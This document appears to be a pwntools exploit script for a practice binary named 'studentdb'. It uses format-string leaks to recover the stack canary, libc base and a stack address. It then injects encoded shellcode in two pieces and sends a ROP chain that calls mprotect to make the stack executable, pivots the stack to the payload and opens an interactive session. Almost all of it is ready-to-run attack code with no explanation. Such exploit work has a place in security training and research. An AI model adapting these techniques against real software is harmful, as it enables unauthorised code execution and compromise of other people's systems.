from pwn import *

context.terminal = ['tmux', 'splitw', '-h']
target = process("./studentdb")

# break add_student
gdbcommand = """
    break add_student
"""
# gdbcommand = """
#     break print_student_name
# """

gdb.attach(target, gdbscript=gdbcommand)


# calcualted offsets
libc_offset = 0x1e9000

# write primitive
def add_student(proc, choice, idx, name):
    # choice & indx & name
    print("[+] Adding Student...")
    proc.sendline(str(choice).encode()) # making choice
    proc.recvuntil(b"name:")
    proc.sendline(str(idx).encode()) # selcting index
    proc.recvuntil(b"Enter student name:")
    proc.sendline(name) # sending name


# read primitive
def read_student_name(proc, choice, idx):
    print("[+] Read from database")
    proc.sendline(str(choice).encode())
    proc.recvuntil(b"student name:")
    proc.sendline(str(idx).encode())
    return target.recvuntil(b"\n\n").decode().split("\n")[:-2][2]

def recv_until_choice():
    target.recvuntil(b"choice:")

def convert_bytes_to_int(value):
    return int(value, 16)

# add_student(target, 1, 0, "John")
# target.recvuntil(b"choice:")
# read_student_name(target, 2, 0)

# leaking canary
add_student(target, 1, 0, "%63$p".encode())
recv_until_choice()
stack_canary = read_student_name(target, 2, 0)
print("[+] Stack Canary:", stack_canary)


# libc addres
add_student(target, 1, 0, "%4$p".encode())
recv_until_choice()
arb_libc_address = read_student_name(target, 2, 0)
print("[+] Leaked Libc Address:", arb_libc_address)
libc_base = convert_bytes_to_int(arb_libc_address)-libc_offset
print("[+] Calculated Libc Base:", hex(libc_base))



# libc addres
add_student(target, 1, 0, "%8$p".encode())
recv_until_choice()
leaked_stack = read_student_name(target, 2, 0)
print("[+] Leaked Stack Address:", leaked_stack)
stack_rop_address = convert_bytes_to_int(leaked_stack)
# print("[+] Calculated Libc Base:", hex(libc_base))


# shellcode

scode =  b""
scode += b"\x90\x90\x90\x90"
scode += b"\xdb\xce\xd9\x74\x24\xf4\xb8\xa4\xad\x37\xa8\x5b"
scode += b"\x29\xc9\xb1\x12\x83\xeb\xfc\x31\x43\x13\x03\xe7"
scode += b"\xbe\xd5\x5d\xd6\x1b\xee\x7d\x4b\xdf\x42\xe8\x69"
scode += b"\x56\x85\x5c\x0b\xa5\xc6\x0e\x8a\x85\xf8\xfd\xac"
scode += b"\xaf\x7f\x07\xc4\xef\x28\x64\x83\x98\x2a\x8b\x8c"


scode2 = b""
scode2 += b"\x57\xa2\x6a\x62"
scode2 += b"\x01\xe4\x3d\xd1\x7d\x07\x37\x34"
scode2 += b"\x4c\x88\x15\xde\x21\xa6\xea\x76\xd6\x97\x23\xe4"
scode2 += b"\x4f\x61\xd8\xba\xdc\xf8\xfe\x8a\xe8\x37\x80"

# sending 1st part of shellcode
add_student(target, 1, 1, scode)
recv_until_choice()

# sending 2nd part of shellcode
add_student(target, 1, 2, scode2)
recv_until_choice()


# %ebx ⇒ 0xfffdd000 | Stack address ends with null byte
# %ecx ⇒ 0x00021000 | Length contains bunch of null bytes | 0x11111111
# %edx ⇒ 0x0000007 | (RWX): Protection value is 0x7, we cannot simply pass 0x7 into x32bit register, this results in null bytes
# %eax ⇒ 0x0000007d | syscall number, issue is same as the preceding parameters

nop = 0x90909090

stack_address_raw = 0xfffdd001
stack_size = 0x01010101

# offsets
pop_ebx_offset = 0x0001de56;  # ; pop ebx; ret;
dec_ebx_offset = 0x00166d24;  # ; dec ebx; lea eax, [ecx + 0xa]; ret; 
pop_ecx_edx_offset = 0x00030ea3 # ; pop ecx; pop edx; ret; 
# inc_dec_offset = 0x001298da # ; inc edx; add al, 0x5b; ret;
inc_dec_16d = 0x000b89d5 # add edx, 0x16d; mov eax, edx; ret;
mov_eax_syscall = 0xfe881 # mov eax, 0x7d; syscall;

xchg_ebx_eax = 0x001026e5 # xchg ebx, eax; ret; 
xchg_esp_eax = 0x00051ce3 # xchg esp, eax; ret



print("[+] Building rop chain ...")
rop_chain = struct.pack("I", libc_base+pop_ebx_offset) # ; pop ebx; ret; 
rop_chain += struct.pack("I", stack_address_raw) # stack address + 1
rop_chain += struct.pack("I", libc_base+ dec_ebx_offset) # dec ebx; lea eax, [ecx + 0xa]; ret; 
rop_chain += struct.pack("I", libc_base + pop_ecx_edx_offset) # pop ecx; pop edx; ret; 
rop_chain += struct.pack("I", stack_size) # size to protect; pops to ecx
rop_chain += struct.pack("I", 0xfffffe9a) # moves to edx; later it 'll be incremented to become 0x7
rop_chain += struct.pack("I", libc_base + inc_dec_16d) # add edx, 0x16d; mov eax, edx; ret;
rop_chain += struct.pack("I", libc_base + mov_eax_syscall) # mov eax, 0x7d; syscall;
rop_chain += struct.pack("I", 0x90909090) # compensating pop ebx inside mprotect
rop_chain += struct.pack("I", 0xffffd67c) # return address -> nop -> shellcode
rop_chain += b"\x90" * 24
rop_chain += struct.pack("I", convert_bytes_to_int(stack_canary))
rop_chain += b"B" * 4 
rop_chain += struct.pack("I", stack_rop_address) # ebx
rop_chain += b"D" * 4 # ebp
rop_chain += struct.pack("I", libc_base + xchg_ebx_eax)
rop_chain += struct.pack("I", libc_base + xchg_esp_eax)
add_student(target, 1, 0, rop_chain)

# print(target.recv_raw(0x100))
target.interactive()


